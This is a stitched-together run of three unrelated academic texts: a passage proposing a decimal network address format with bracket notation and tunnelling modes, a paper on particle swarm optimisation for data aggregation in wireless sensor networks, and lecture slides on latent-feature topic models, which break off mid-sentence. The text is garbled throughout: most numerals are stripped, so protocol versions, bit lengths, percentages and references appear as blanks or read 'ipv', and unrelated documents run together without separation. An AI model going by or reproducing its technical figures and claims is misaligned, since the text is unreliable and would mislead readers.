length is bits, and this field indicates the protocol type in the field following the ipv header. ) hop limit. 
its length is bits, and this field is subtracted by one each time a node forwards a packet. ) source address. its length is bit ~ bit; specify ipv packet sender address, using variable length and location method. ) destination address. its length is bit ~ bit, and the destination address of ipv packet is specified. ) time. it is used to control the lifetime of the address in the header. ) identification code. it identifies the authenticity of the address in the header. b. text representation of ipv addresses this paper has developed a unified method to represent ipv address, including "bracket decimal", "curly braces decimal" and "parentheses bracket". ) bracket decimal the bracket decimal can be expressed in the following two ways: method : use "[]" when the length is bits. where, the parentheses are expressed in decimal notation, and the length can be written in indefinite length. method : length able address in the form of representation is "y[y] [y] [y] [y] [y] [y]", where each y represents the address as a bit part, and used the decimal representation. because = . each "y" represents a bits portion of the address and is represented in decimal. the difference in decimal number of each of the range is to , such as the first digit from left the range is ~ , so you don't have the phenomenon of overflow. ) curly braces decimal this method divides the -bit address into four -bit decimal numbers represented by curly braces separating them. the representation is "z}z}z}z", where each z represents a -bit portion of the address and is represented in decimal. it's exactly the same as y, but it's also compatible with y, so you can mix the two. this approach makes it very convenient for ipv addresses to be compatible in ipv .such as: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]j.j.j.j; ) bracketed notation international journal of advanced network, monitoring and controls volume , no. , since ipv has an address length of bits, whether you use four or eight segments, there are still many bits in each segment. for example: ...] ]... ...] ]... the above situation input cumbersome, prone to errors. for convenience, the parenthesis notation -- (k/l) is introduced. where "k" means or and "l" means the number of or .in this way, the above two examples can be abbreviated as: ...]( / ) of ]... ...] ( / )]... ) text representation of address prefixes the ipv address scheme is similar to the cidr (unclassified addressing) scheme of ipv in that the address prefix is used to represent the network hierarchy. on the representation of ipv address prefix, a representation similar to cidr is adopted, whose form is as follows: ipv address/address prefixes length for example, address prefix [ [ [ [ [ [ of bits can be expressed as: [ [ [ [ [ [ [ / ) ipv address type c) pure ipv address the form is y[y[y[y[y[y[y[y each “y” represents a decimal integer from to = . d) ipv addresses compatible with ipv the form is: y[y[y[y[y[y[y[d.d.d.d each “y” represents a decimal integer from to = . “d” represents a decimal integer between and from the original ipv . e) ipv addresses compatible with ipv the form is: y[y[y[y[x:x:x:x:x:x:x:x each “y” represents a decimal integer from to = .the “x” represents a hexadecimal number that originally ipv ranged from to ffff. f) special compatibility address in order to guarantee the research results of ipv and ipv , ipv has designed some compatible addresses. the new compatibility address design idea is in this part of the address with the appropriate prefix form. 
in order to make their representation more convenient and ensure accuracy, the following abbreviations were introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d where, each y represents the address as bits, represented by decimal; each “x” represents the original ipv address of bits, in hexadecimal; each “d” represents the original ipv address of bits, in decimal notation. g) [] full decimal address in order to facilitate the application of logistics code and full decimal address. category number is recommended. in the power of to the power of , fixed length positioning method is adopted according to application needs. h) ipv address for transitional period ipv is compatible with ipv and ipv technical protocols for the internet, but ipv and ipv technical protocols are not compatible with ipv in reverse. c. ipv and ipv transition to ipv in order to solve the ipv flat to ipv transition, special design ipv transition address. transitioning ipv to a address in the ipv address allows a small change to the current system to complete the transition. in ipv , there is a section of j.j.j.j address, where each “j” represents a decimal number from to ( ~ ), where the preceding [ ] can be omitted in the middle of the local address, that is, local users (or designated users) can use j.j.j.j directly, which is different from the original ipv d.d.d.d. at the same time, this part of the user in order to smooth the international journal of advanced network, monitoring and controls volume , no. , transition to full decimal can be allocated at the same time decimal. in order to improve the software and hardware in the future, there is no need to re-address, such as [ ] can be written into [ ] . . . can be directly used in a local ip network to write . . . , so that the original terminal can be used. interim ipv address system can be modified to the original ipv system. the ipv header is also used, but the version number is to distinguish the original ipv .however, users may use the original terminal equipment within the territory. ipv header tcp/udp header data ipv header ipv header tcp/udp header data ipv header tcp/udp header data raw ipv datagrams the ipv header encapsulates the ipv header in the tunnel ipv datagrams restored through the tunnel ipv host- ipv /ipv tunnel router-r ipv router- ipv router- ipv /ipv tunnel router-r ipv host- internet[ipv ] figure . ipv is ipv compatible figure above means that it is possible to build the ipv backbone, provide application services and gradually upgrade the backbone network to ipv without affecting or modifying the existing terminal ipv applications.ipv inherited and transplanted most of the application functions on the existing ipv internet, and successfully solved the development problem of ipv online application functions. most of the existing internet application functions can be copied to the ipv network, and began to enter the practical stage. at the same time, the application of ipv will continue to innovate and develop. d. support ipv device working mode in the decimal network working group of scientific research, the current ipv support devices are ipv - m wifi router, ipv - m wi-fi router, ipv - m router, ipv - g router, ipv -linux client and ipv -windows client. 
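as a rough illustration of the bracket-decimal text form described above, the sketch below writes a large integer address as decimal segments separated by "[" and parses it back. the 256-bit total length and the fixed 32-bit segment width are assumptions made only for this example (the notation above also allows variable lengths), and the sample value is invented.

```python
def to_bracket_decimal(address_int, segments=8, seg_bits=32):
    """Write an integer address as decimal segments separated by '[',
    mirroring the y[y[y[... form; segment count and width are assumptions."""
    if address_int < 0 or address_int >= 1 << (segments * seg_bits):
        raise ValueError("address does not fit in the assumed width")
    mask = (1 << seg_bits) - 1
    parts = [str((address_int >> (i * seg_bits)) & mask)
             for i in reversed(range(segments))]
    return "[".join(parts)


def from_bracket_decimal(text, seg_bits=32):
    """Inverse of the above: parse '['-separated decimal segments back
    into a single integer address."""
    value = 0
    for part in text.split("["):
        value = (value << seg_bits) | int(part)
    return value


addr = (86 << 32) | 3232235777        # invented example value
print(to_bracket_decimal(addr))       # -> 0[0[0[0[0[0[86[3232235777
assert from_bracket_decimal(to_bracket_decimal(addr)) == addr
```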
the ipv router network interface types include ordinary ethernet interface, to interface (convert ipv packets into ipv packets according to custom mapping rules), to interface (convert ipv packets into ipv packets according to custom mapping rules) and sit interface (realize ipv data packets to be transmitted in the current ipv network. implement over , where ipv data over is the data portion of the ipv packet. the following takes ipv / m wifi router as an example to explain its working mode vpn. under the vpn mode, most configuration of the router is completed by the background server, which is divided into ipv mode and ipv mode. in ipv mode, the router runs the nat module, and the client (ipv ) accesses the internet network in the same way as other ipv routers. when the client accesses the server in ipv backbone network, the vpn server will communicate with it. although the pure ipv client is not supported in this mode, the communication between the client of wifi router a and the client of wif router b is supported. the data flow diagram is shown in figure below: international journal of advanced network, monitoring and controls volume , no. , (a) one-way access between ipv of vpn tunnel and beijing backbone node (b) ipv reciprocal visits within the vpn tunnel figure . (a) one-way access between ipv of vpn tunnel and beijing backbone node; (b) ipv reciprocal visits within the vpn tunnel international journal of advanced network, monitoring and controls volume , no. , in ipv mode, clients (ipv ) access the internet network in the same way as other ipv routers. this mode supports the pure ipv client, but does not support the communication between the client of wifi router a and the client of wif router b, as shown in data flow figure . (a) ipv exchange visits between vpn tunnel and beijing backbone node (b) ipv mutual visits within the vpn tunnel figure . (a) ipv exchange visits between vpn tunnel and beijing backbone node; (b) ipv mutual visits within the vpn tunnel international journal of advanced network, monitoring and controls volume , no. , to sum up, ipv inherits most functions on the existing internet. in the protection of ipv and ipv research results, address expansion, security verification and other operations. this makes ipv more competitive in the development of the internet, and its functions will continue to develop with the development of technology. vi. summarizes although the use of nat (" network address translation "), cidr (" classless inter-domain routing ") and other technologies can alleviate the ipv crisis to some extent. however, this does not fundamentally solve the problem, and at the same time, it will bring about new problems in cost, service quality, safety and other aspects, but create greater challenges. but the new generation network layer protocol ipv itself also has the corresponding question, causes it not to have the omni-directional. in this situation, a new network will come into being, which not only represents the progress of people's technology, but also symbolizes people's dedication to new technology. this paper mainly designs and researches the new network address coding, compares the ipv and ipv address coding, and proposes a new address coding. this method solves the problem of address exhaustion thoroughly, and puts forward the theory of verification before communication, which solves the problems of current network address exhaustion and information security. 
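the packet-conversion interfaces and the tunnel working modes described above rest on the same encapsulation idea as the earlier tunneling strategy: the whole inner datagram rides as the data portion of an outer datagram and is unwrapped at the far end of the tunnel. the minimal sketch below uses placeholder byte strings, not real header layouts.

```python
def encapsulate(outer_header: bytes, inner_datagram: bytes) -> bytes:
    """Tunnel entry: the complete inner datagram (its own header included)
    becomes the data portion of the outer datagram."""
    return outer_header + inner_datagram


def decapsulate(tunnel_datagram: bytes, outer_header_len: int) -> bytes:
    """Tunnel exit: strip the outer header and hand the original datagram
    back to the receiving host's protocol stack."""
    return tunnel_datagram[outer_header_len:]


inner = bytes([0x45]) + bytes(19) + b"payload"   # stand-in inner datagram
outer = bytes(12)                                # stand-in outer tunnel header
assert decapsulate(encapsulate(outer, inner), len(outer)) == inner
```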
it also describes the ipv -compatible ipv working mode, which guarantees the existing research results, provides some new design ideas for new network addresses, and promotes the development of new network addresses. references [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group.internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group.transmission of ipv packets over ethernet networks.rfc- , . . [ ] j. onions, network working group.a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] information technology-futurenetwork-problem statement and requirement-part : security, iso/iec dtr - , , . [ ] wang wenfeng, xie jianping,etc.product and servicedigital identification format for information procession.sj/t - , . . [ ] s. deering, r. hinden, internet protocol, version (ipv )-specification, network working group. rfc- , . . your paper's title starts here: please center gathering correlated data in wireless sensor networks using a heuristic algorithm yuexian wang, cheng chew lim school of electrical and electronic engineering, the university of adelaide, adelaide, australia, {jwang, cclim}@eleceng.adelaide.edu.au abstract. we propose a routing scheme for data gathering and aggregation in wireless sensor networks. the scheme aims to optimise an aggregation tree in order to minimise the energy dissipation of data aggregation and transmission. a modified particle swarm optimisation algorithm is developed in the proposed scheme. in addition, the routing scheme uses a generic data aggregation model which accommodates different correlation conditions. the performance of the proposed scheme is evaluated and compared with three other existing data gathering algorithms. simulation results show that the proposed scheme outperforms existing algorithms in terms of energy consumption and that the scheme can adapt to the change of network connectivity and data correlation conditions. keywords: sensor networks, data aggregation, particle swarm optimisation, correlation coefficient, energy consumption . introduction in wireless sensor networks, a large number of sensor nodes are scattered in an observed region and left unattended after deployment, and all nodes in the network are thus energy-constrained. energy consumption, scalability, and load balancing are important requirements for many data gathering sensor network applications. the tree-based data gathering algorithm is proposed for achieving development in this area, such as the shortest path tree algorithm [ ], the minimum spanning tree algorithm [ ] and the shallow light tree algorithm [ ]. in a tree-based network, sensor nodes are organised into a tree structure where data aggregation is performed at intermediate nodes along the tree and a concise representation of the data is transmitted to the root node. therefore, the research problem is to find out a routing tree with data aggregation to achieve minimum energy expense. this problem is an np-complete problem [ ,] because it can be reducible to a weighted set cover problem in graph theory, which has been shown to be np complete [ ]. in this paper, we propose a routing scheme for data gathering and aggregation in wireless sensor networks. the scheme utilises a heuristic algorithm to optimise data traffic and the transmission structure in terms of energy consumption. 
using this heuristic algorithm, significant data traffic can be reduced because more suitable aggregator nodes can be selected to eliminate data redundancy. in order to reduce the energy consumption of data transmission, the heuristic algorithm optimises the transmission structure as well. in addition, a generic aggregation model which does not depend on any specific relationship among correlated data is exploited in order to adapt to a variety of applications. the remainder of this paper is organised as follows: we first introduce the standard particle swarm optimisation algorithm, then present the system models of our new scheme, describe the proposed modified particle swarm optimisation algorithm for the routing scheme, discuss the performance evaluation and simulation results, and finally conclude the paper.

standard particle swarm optimisation algorithm. the particle swarm optimisation (pso) algorithm stems from the simulation of a simplified society model, and it was proposed as a typical heuristic algorithm inspired by the behaviour of bird flocking [ ]. the pso algorithm is used to search for optimal or near-optimal solutions in a large search space. assume that in a d-dimensional search space m particles compose a swarm and fly with a certain velocity, where particle i is denoted by a d-dimensional vector $x_i = \{x_{i1}, x_{i2}, \ldots, x_{iD}\}$, $i = 1, 2, \ldots, m$. the performance of $x_i$ is assessed by its fitness value, which is calculated by substituting $x_i$ into the objective function. the motion of particles changes according to the following equations:

$v_{id}^{t+1} = \omega\, v_{id}^{t} + c_1\,\mathrm{rand}()\,(p_{ibest}^{t} - x_{id}^{t}) + c_2\,\mathrm{rand}()\,(p_{gbest}^{t} - x_{id}^{t})$, (1)

$x_{id}^{t+1} = x_{id}^{t} + v_{id}^{t+1}$, (2)

where $t$ is the iteration number, $v_{id}$ denotes the velocity of particle $i$ in the $d$-th dimension ($1 \le d \le D$) of the particle swarm space, $x_{id}$ represents the current position of particle $i$, $p_{ibest}$ is its best previous position, and $p_{gbest}$ is the best position among all particles in the population. $\mathrm{rand}()$ is a random function with range $[0, 1]$. $c_1$ and $c_2$ are learning factors used to accelerate the motion of the particles. the inertia weight $\omega$ is a user-specified parameter that controls, together with $c_1$ and $c_2$, the impact of the previous historical values of a particle's velocity on its current one. a large inertia weight facilitates global exploration while a small inertia weight facilitates fine-tuned local search.

system models. a. network model. one base station and n sensors are assumed to be distributed uniformly in a field and to be quasi-stationary. the base station sends a query and k (k ≤ n) sensors respond to that query. wireless links are considered bidirectional and symmetric, so that any two nodes can communicate using the same transmission power levels only if they are within range of each other. sensor nodes are homogeneous and arbitrarily allocated with equal initial energy. in addition, nodes are not location-aware and are left unattended after deployment. b. data correlation and aggregation model. we assume that there is correlation among the data generated by the k sensors. to accommodate a wide range of scenarios, we abstract the data redundancy between two sensor nodes using a single value ρ, termed the correlation coefficient. assume that the data amount after aggregation is not less than any of its inputs and not more than the sum of all inputs. let $r_{v_i}$ and $r_{v_j}$ be the amounts of data generated by nodes $v_i$ and $v_j$ in response to a query.
without loss of generality, if $r_{v_i} \le r_{v_j}$, the output $r(v_i, v_j)$ after data aggregation is:

$r(v_i, v_j) = r_{v_j} + (1 - \rho)\, r_{v_i}$, (3)

c. energy model. we adopt the free-space propagation model to approximate the path loss sustained because of wireless channel transmission [ ]. the energy expended by the radio for transmitting and receiving an l-bit message over a distance d is given by:

$E_{TX}(l, d) = l\, E_{elec} + l\, \varepsilon_{fs}\, d^{2}$, (4)

$E_{RX}(l) = l\, E_{elec}$, (5)

where $E_{TX}$ is the energy dissipated in the transmitter, $E_{elec}$ is the per-bit energy dissipation for running the transceiver circuitry, $\varepsilon_{fs}$ is the amplifier parameter for the free-space propagation model, and $E_{RX}$ is the energy the radio expends at the receiver.

problem formulation. given the set of source nodes s and the base station d in a wireless sensor network g(v, e), our objective is to find a connected subgraph g′(v′, e′) ⊆ g, where s ⊆ v′ and d ∈ v′, in order to minimise the energy consumption for transmitting data from all source nodes to the base station. the objective function is formulated as follows:

$\min \sum_{v_i \in V'} r_{v_i}\, \omega(v_i, d)$, (6)

where $\omega(v_i, d)$ is the total weight of the edges on the path from node $v_i$ to the base station on the constructed aggregation tree. in wireless networks, the weight of each edge can be considered as the energy expended per unit of data for communication and data aggregation. $r_{v_i}$ is the amount of data generated by node $v_i$.

pso modified by genetic algorithm for routing with aggregation. the standard pso algorithm is a real-valued pso, and it cannot perform addition or subtraction directly on a path. hence, the standard pso algorithm has to be extended to deal with discrete optimisation problems which require the ordering or arranging of discrete elements, e.g., the routing tree with aggregation problem. facing these problems, we propose a pso algorithm which is modified by the genetic algorithm [ ] in order to address the discrete nature of our optimisation problem. the core of this algorithm is an equivalent form of the velocity and displacement formulae combined with ideas from the genetic algorithm. hence, eq. (1) and eq. (2) are replaced by eq. (7) and eq. (8):

$v_{id}^{t+1} = \omega\, v_{id}^{t} \oplus (p_{ibest}^{t} \otimes x_{id}^{t}) \oplus (p_{gbest}^{t} \otimes x_{id}^{t})$, (7)

$x_{id}^{t+1} = x_{id}^{t} \oplus v_{id}^{t+1}$, (8)

where the operator ⊕ represents a composition, and the operator ⊗ indicates information exchange, which is implemented by crossover. a. encoding. encoding involves coding path serial numbers into a feasible solution (or a position) in the search space. we represent the individual, for a specific aggregation tree, as a string of node numbers. the length of each individual is always equal to the number of relay nodes. a routing scheme for a network with relay nodes and one base station is shown in fig. (a), and the corresponding particle is shown in fig. (b). (a) routing tree (b) individual (solution representation) fig. encoding a routing tree as an individual. b. population initialisation. in general, there are two ways to generate the initial population: heuristic initialisation and random initialisation. for most large-scale problems, such as network communication design, random initialisation has a better effect on reaching global optimal solutions. the main idea of our work is that the correspondence of node behaviour obtained through local optimisation is greater than the correspondence of node behaviour under random initialisation. the spt algorithm and the mst algorithm produce good initial populations when the correlation coefficient is equal to 0 and 1, respectively.
hence the initial population should include the shortest path tree and the minimum spanning tree. c.fitness function. we define the fitness value as the energy consumption of the network, and our metric for total energy dissipation takes into consideration including the transmit energy, the receive energy and aggregation energy. d.selection. the function of selection operator is to select individuals which have relative large fitness values with relative large probabilities from their parent generation. the pso algorithm then puts the chosen individuals in the offspring generation and waits for further evolution implemented by crossover and mutation. we adopt the ranking selection [ ] as a part of implementation of the modified pso algorithm in this paper. e.crossover. the operator  in eq. indicates information exchange which is similar to the operation of crossover in the genetic algorithm, so we use the crossover as the equivalent form of the  operation. because of the requirement of encoding, source nodes are known at the stage of crossover. first, we randomly select a gene in the locus of the same source node between the optimal individual and a generic individual and put it into the same locus of the offspring. we then make the same selection at the locus of the relay node which is indicated by the previous chosen gene. this process is repeated until the base station is found. for the rest nodes which are not used, genes from the same locus between the two individuals are selected randomly. fig. is an example for the crossover operation. fig. crossover between the optimal individual and the generic individual. f.mutation. multiplying ω by k id v in eq. , indicating that a particle searches toward a new space, is similar to the operation of mutation in the genetic algorithm, so we use the mutation as the equivalent form of k id v . we select a node to substitute for node from set Ω where the node has the same previous hop node and next hop node as the nod . this process is illustrated by fig. . fig. examples of the mutation operation. g.addition. the addition operation indicates the sum of several processing steps. through orderly executing the equivalent subitems in the pso algorithm, we can obtain the effect of addition. in the equivalence of the addition, the outputs of previous steps are the inputs of latter steps. according to eq. and eq. , the computation sequence is from right to left. applying two crossover operations and one mutation operation to a generic aggregation tree, we can acquire an offspring and then put it in the population for the next iteration. . simulation results and discussions in our simulation, average energy dissipation and the maximum run (the first node dies) are metrics used to compare the pso algorithm with three existing tree-based data gathering algorithms: the shortest path tree (spt) algorithm, the minimum spanning tree (mst) algorithm, and the shallow light tree (slt) algorithm. a square region of size m× m is uniformly divided into grids, and each sensor is deployed in one grid. since the coordinate of each sensor is determined by a random function which can generate uniformly distributed random numbers within the interval [ , ], the sensor nodes are randomly distributed. each node is equipped with j initial energy at the beginning of the simulation. every node transmits a bit message per round to the base station. the calculation of energy dissipation in the simulations is based on eq. and eq. . 
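the per-round energy bookkeeping behind this fitness value can be sketched directly from the radio model in eqs. (4)-(5): each sender pays the electronics plus free-space amplifier cost, each receiver pays the electronics cost, and an aggregating node additionally pays a per-bit aggregation cost. the sketch below is one simple way to do that accounting; the parameter values and the tiny tree are placeholders, not the settings used in the simulations.

```python
import math

# Placeholder radio parameters (illustrative only).
E_ELEC = 50e-9      # J/bit, transceiver electronics
EPS_FS = 10e-12     # J/bit/m^2, free-space amplifier
E_DA   = 5e-9       # J/bit/signal, per-bit aggregation cost

def tx_energy(bits, distance):
    """Eq. (4): energy to transmit `bits` over `distance` metres."""
    return bits * E_ELEC + bits * EPS_FS * distance ** 2

def rx_energy(bits):
    """Eq. (5): energy to receive `bits`."""
    return bits * E_ELEC

def fitness(tree, data_bits, positions):
    """Total energy of one gathering round on an aggregation tree.
    `tree` maps each node to its parent (the base station maps to None),
    `data_bits` maps each node to the bits it forwards after aggregation,
    `positions` maps nodes to (x, y) coordinates."""
    total = 0.0
    for node, parent in tree.items():
        if parent is None:
            continue
        d = math.dist(positions[node], positions[parent])
        total += tx_energy(data_bits[node], d)   # sender side
        total += rx_energy(data_bits[node])      # receiver side
        total += E_DA * data_bits[node]          # aggregation cost at the receiver
    return total

# Tiny example: two sources relaying through node 1 to the base station 0.
tree = {2: 1, 3: 1, 1: 0, 0: None}
bits = {2: 2000, 3: 2000, 1: 2000, 0: 0}   # node 1 aggregates its inputs to 2000 bits
pos  = {0: (0, 0), 1: (20, 0), 2: (40, 10), 3: (40, -10)}
print(f"{fitness(tree, bits, pos):.6e} J")
```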
we use the same parameters as that in [ ]: elec e = nj/bit and fs  = pj/bit/ m . moreover, the per bit energy dissipation for aggregating data is set as da e = nj/bit/signal and the transmission range is set as r = m . (a) (b) fig. influence of the number of source nodes on (a) mean of energy consumption versus the number when ρ approaches and (b) mean of energy consumption versus the number of source nodes when ρ approaches fig. (a) shows the mean of energy consumption per round versus the number of source nodes using an aggregation tree with the pso algorithm, the mst algorithm, the spt algorithm, and the slt algorithm. clearly, when ρ approaches the pso algorithm performs as well as the spt algorithm and reduces energy consumption significantly compared with the mst algorithm and the slt algorithm. a reduction of average energy consumption of about % and % can be obtained by the pso algorithm as well as the spt algorithm over the slt algorithm and the mst algorithm, respectively. in a network with poor correlation, the pso algorithm reduces to the spt algorithm, and data should be transmitted directly to the base station via the shortest paths instead of aggregator nodes by detouring, since there is no redundancy among the data, and aggregation at any relay node is not efficient in reducing the data amount. when ρ approaches as illustrated in fig. (b), the pso algorithm performs better than all other algorithms with regard to the mean of energy consumption. a reduction of average energy consumption of about %, %, and % can be obtained by the pso algorithm over the mst algorithm, the slt algorithm, and the spt algorithm respectively. the performance of the mst algorithm is the closest to that of the pso algorithm. however, since some nodes within one hop to the base station would waste energy for detouring to aggregator nodes rather than transmitting directly to the base station, the mst algorithm cannot achieve the optimal performance. because the nodes can not sufficiently take advantage of data aggregation to reduce the transmission task, the spt algorithm expends the most energy compared with the three other algorithms. the slt algorithm can balance between data aggregation and direct transmission, but it gets the benefit implicitly. hence the energy consumption of the pso algorithm increases more slowly than the slt algorithm with the increase in the number of source nodes. fig. (a) illustrates the average energy consumption of the four algorithms when the number of source node k= . the costs of all algorithms decrease with the increase in ρ, the correlation coefficient. this exemplifies that data aggregation in sensor networks can greatly benefit the routing performance by reducing redundancy among correlated data. in addition, the pso algorithm evidently outperforms other algorithms in the energy consumption with the increase in the correlation coefficient. a reduction of average energy consumption of about %, %, and % can be obtained by the pso algorithm over the slt algorithm, the mst algorithm, and the spt algorithm, respectively. when ρ is small, the spt algorithm performs well. however, it does not benefit from the increase in ρ as it cannot efficiently perform data aggregation to eliminate redundancy among data. in the contrast, the mst algorithm gets the worst performance when ρ is small since it pursues data aggregation but data are actually low correlated. 
the pso algorithm performs much better than the slt algorithm since the pso algorithm recalculates total energy dissipation in every stage to get perfect matching and thus can adapt to the correlation among nodes. we can see from fig. (b) that the maximum run of all algorithms grows with the increase in ρ. the main reason is that data aggregation can significantly reduce traffic by eliminating redundancy among correlated data and hence consume less energy. since aggregator nodes receive data from different nodes and perform data aggregation, they always die earlier than others due to the heavy load. when ρ < . , the spt algorithm outperforms other algorithms markedly because data are opportunistically aggregated and the amount of data for aggregation is not large. the spt algorithm does not benefit well when ρ increases from . to due to insufficient data aggregation. because the mst algorithm and the slt algorithm prefer to detour to pursue data aggregation, large amount of data may be aggregated on nodes near the sources, and these aggregator nodes will exhaust energy earlier than that in the pso algorithm. in addition, the maximum run of the pso algorithms drops dramatically when ρ varies from to . because the pso algorithm can find out more aggregator nodes to share the same paths and the load of aggregator nodes becomes heavier. (a) (b) fig. influence of correlation coefficient on (a) mean of energy consumption versus the correlation coefficient when k= and (b) the number of run versus the correlation coefficient when k= . conclusions we propose an energy-efficient data gathering and aggregation routing scheme that caters for the energy challenges in wireless sensor networks. the particle swarm optimisation algorithm is utilised to optimise a joint objective between data traffic and transmission structure. the scheme also adopts a generic data aggregation model which accommodates different correlation conditions. simulation results show that the particle swarm optimisation algorithm outperforms its counterparts in terms of energy consumption. although there is a small sacrifice in the maximum run due to the heavy load of aggregator nodes, the particle swarm optimisation algorithm can be regarded as a good tradeoff since it can save energy and adapt to the change of network connectivity and data correlation conditions. references [ ] w. heinzelman, j. kulik, and h. balakrishnan, “adaptive protocols for information dissemination in wireless sensor networks,” in proc. acm mobicom, aug. , pp. - . [ ] r. c. prim, “shortest connection networks and some generalization,” bell system technical, vol. , no. , pp. - , . [ ] a. goel and k. munagala, “balancing steiner trees and shortest path trees online,” in proc. th acm-siam symp. on discrete algorithms, jan. , pp. - . [ ] r.cristescu, b. beferull-lozano, and m. vetterli, “on network correlated data gathering,” in proc. ieee infocom, vol. , mar. , pp. - . [ ] m. r. garey and d. johnson, computers and intractability: a guide to the theory of np-completeness. w. h. freeman, . [ ] j. kennedy and r. c. eberhart, “particle swarm optimization,” in the ieee conf. on neural networks, iv, , pp. - . [ ] h. xia, h. l. bertoni, and l. r. maciel, “radio propagation characteristics for line-of-sight microcellular and personal communications,” antenna and propagation, vol. , no. , pp. - , oct. . [ ] z. michalewicz, genetic algorithms + data structures = evolution programs, rd ed., springer-verlag, . [ ] j. e. 
baker, “adaptive selection methods for genetic algorithms,” in proc. the st international conference on genetic algorithms, , pp. - . [ ] w. r. heinzelman, a. chandrakasan, and h. balakrishnan, “an application-specific protocol architecture for wireless microsensor networks,” wireless communications, vol. , no. , pp. - , october . improving topic models with latent feature word representations improving topic models with latent feature word representations mark johnson joint work with dat quoc nguyen, richard billingsley and lan du dept of computing macquarie university sydney australia july / outline introduction latent-feature topic models experimental evaluation conclusions and future work / high-level overview • topic models take a corpus of documents as input, and jointly cluster: É words by the documents that they occur in, and É documents by the words that they contain • if the corpus is small and/or the documents are short, these clusters will be noisy • latent feature representations of words learnt from large external corpora (e.g., word vec, glove) capture various aspects of word meanings • here we use latent feature representations learnt on a large external corpus to improve the topic-word distributions in a topic model É we combine the dirichlet-multinomial models of latent dirichlet allocation (lda) with the distributed representations used in neural networks É the improvement is greatest on small corpora with short documents, e.g., twitter data / related work • phan et al. ( ) assumed that the small corpus is a sample of topics from a larger corpus like wikipedia, and use the topics discovered in the larger corpus to help shape the topic representations in the small corpus É if the larger corpus has many irrelevant topics, this will “use up” the topic space of the model • petterson et al. ( ) proposed an extension of lda that uses external information about word similarity, such as thesauri and dictionaries, to smooth the topic-to-word distribution • sahami and heilman ( ) employed web search results to improve the information in short texts • neural network topic models of a single corpus have also been proposed (salakhutdinov and hinton, ; srivastava et al., ; cao et al., ). 
/ latent dirichlet allocation (lda) θd ∼ dir(α) zdi ∼ cat(θd ) φz ∼ dir(β) wdi ∼ cat(φzdi ) • latent dirichlet allocation (lda) is an admixture model, i.e., each document d is associated with a distribution over topics θd • inference is typically performed with a gibbs sampler over the zd,i, integrating out θ and φ (griffiths et al., ) p(zdi =t | z¬di ) ∝ (n t d¬i + α) n t,wdi ¬di + β nt¬di + v β / the dirichlet multinomial mixture (dmm) model θ ∼ dir(α) zd ∼ cat(θ) φz ∼ dir(β) wdi ∼ cat(φzd ) • the dirichlet multinomial mixture (dmm) model is a mixture model, i.e., each document d is associated with a single topic zd (nigam et al., ) • inference can also be performed using a collapsed gibbs sampler in which θ and φz are integrated out (yin and wang, ) p(zd = t | z¬d ) ∝ (m t ¬d + α) Γ(nt¬d + v β) Γ(nt¬d + nd + v β) ∏ w∈w Γ(nt,w¬d + n w d + β) Γ(nt,w¬d + β) / latent feature word representations • traditional count-based methods (deerwester et al., ; lund and burgess, ; bullinaria and levy, ) for learning real-valued latent feature (lf) vectors rely on co-occurrence counts • recent approaches based on deep neural networks learn vectors by predicting words given their window-based context (collobert and weston, ; mikolov et al., ; pennington et al., ; liu et al., ) • we downloaded the pre-trained vectors for word vec and glove for this paper / outline introduction latent-feature topic models experimental evaluation conclusions and future work / latent-feature topic-to-word distributions • we assume that each word w is associated with a word vector ωw • we learn a topic vector τt for each topic t • we use these to define a distribution cate(w) over words: cate(w | τtω>) ∝ exp(τt ·ωw ) É τtω > is a vector of unnormalised scores, one per word • in our topic models, we mix the cate distribution with a multinomial distribution over words, so we can capture ideosyncratic properties of the corpus (e.g., words not seen in the external corpus) É we use a boolean indicator variable that records whether a word is generated from cate or the multinomial distribution / the latent feature lda model θd ∼ dir(α) zdi ∼ cat(θd ) φz ∼ dir(β) sdi ∼ ber(λ) wdi ∼ ( − sdi )cat(φzdi ) + sdi cate(τzdi ω >) • sdi is the boolean indicator variable indicating whether word di is generated from cate • λ is a user-specified hyper-parameter determining how often words are generated from the cate distribution É if we estimated λ from data, we expect it would never generate through cate / the latent feature dmm model θd ∼ dir(α) zdi ∼ cat(θd ) φz ∼ dir(β) sdi ∼ ber(λ) wdi ∼ ( − sdi )cat(φzdi ) + sdi cate(τzdi ω >) • sdi is the boolean indicator variable indicating whether word di is generated from cate • λ is a user-specified hyper-parameter determining how often words are generated from the cate distribution / inference for the lf-lda model • we integrate out θ and φ as in the griffiths et al. 
( ) sampler, and interleave map estimation for τ with gibbs sweeps for the other variables • algorithm outline: initialise the word-topic variables zdi using the lda sampler repeat: for each topic t: τt = arg maxτt p(τt | z,s) for each document d and each word location i: sample zdi from p(zdi | z¬di ,s¬di ,τ) sample sdi from p(sdi | z,s¬di ,τ) / inference for the lf-dmm model ( ) • we integrate out θ and φ as in the yin and wang ( ) sampler, and interleave map estimation for τ with gibbs sweeps • algorithm outline: initialise the word-topic variables zdi using the dmm sampler repeat: for each topic t: τt = arg maxτt p(τt | z,s) for each document d: sample zd from p(zd | z¬d,s¬di ,τ) for each word location i: sample sdi from p(sdi | z,s¬di ,τ) • note: p(zd | z¬d,s¬di ,τ) is computationally expensive to compute exactly, as it requires summing over all possible values for sd / inference for the lf-dmm model ( ) • the computational problems stem from the fact that all the words in a document have the same topic É have to jointly sample document topic zt and indicator variables sd É the sampling probability is a product of ascending factorials • we approximate these probabilities by assuming that the topic-word counts are “frozen”, i.e., they don’t increase within a document É the dmm is mainly used on short documents (e.g., twitter), where the “one topic per document” assumption is accurate ⇒ “freezing” the counts should have less impact É could correct this with a metropolis-hastings accept-reject step p(zd,sd | z¬d,s¬d,τ) ∝ λ kd ( −λ)nd (mt¬d + α) Γ(nt¬d + v β) Γ(nt¬d + nd + v β) � ∏ w∈w Γ(nt,w¬d + n w d + β) Γ(nt,w¬d + β) �� ∏ w∈w cate(w | τt ω>)k w d � / estimating the topic vectors τt • both the lf-lda and lf-dmm associate each topic t with a topic vector τt, which must be learnt from the training corpus • after each gibbs sweep: É the topic variables z identify which topic each word is generated from É the indicator variables s identify which words are generated from the latent feature distributions cate ⇒ we can use a supervised estimation procedure to find τ • we use lbfgs to optimise the l 